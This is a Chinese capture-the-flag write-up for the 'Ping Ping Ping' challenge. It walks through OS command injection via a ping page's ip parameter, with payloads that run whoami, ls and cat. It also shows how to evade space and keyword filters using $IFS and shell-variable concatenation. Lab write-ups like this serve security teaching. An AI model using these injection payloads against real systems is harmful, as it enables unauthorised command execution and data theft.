题目
点进题目,页面只显示/?ip=,没有其他信息
联系到题目名为ping,猜测题目于ping地址有关,先尝试一下
构造payload
http://31e941af-c0d7-49c9-a3fe-84cb13d8adae.node4.buuoj.cn:81/?ip=127.0.0.1
这里猜测可能为远程命令执行漏洞,尝试一下
构造payload
/?ip=127.0.0.1;whoami
返回结果正确,猜测正确,还知道主机为linux
使用命令执行查找flag文件
构造payload
/?ip=127.0.0.1;ls
查看flag文件
构造payload
/?ip=127.0.0.1;cat flag.php
页面显示不要输入空格,这里参考了其他大佬的wp才知道是空格被过滤了
检查页面源代码,没有显示结果(必须通过检车页面源代码,因为php代码有些东西会被前端自动渲染而不显示)
使用空格绕过方法
构造payload
/?ip=127.0.0.1;cat$IFSflag.php
说明绕过空格成功
但是还是无法显示flag文件,并且页面显示fxck your flag,猜测可能过滤了关键字flag,需要绕过flag
构造payload
/?ip=127.0.0.1;a=g;cat$3$IFS$1fla$a.php
页面没有显示,选择查看源代码,看看是否在注释中
得到flag
总结
参考学习文章链接:
[GXYCTF2019]Ping Ping Ping_MiaoA知识的博客-CSDN博客
[GXYCTF2019]Ping Ping Ping_ctf pingpingping_谢添姣的博客-CSDN博客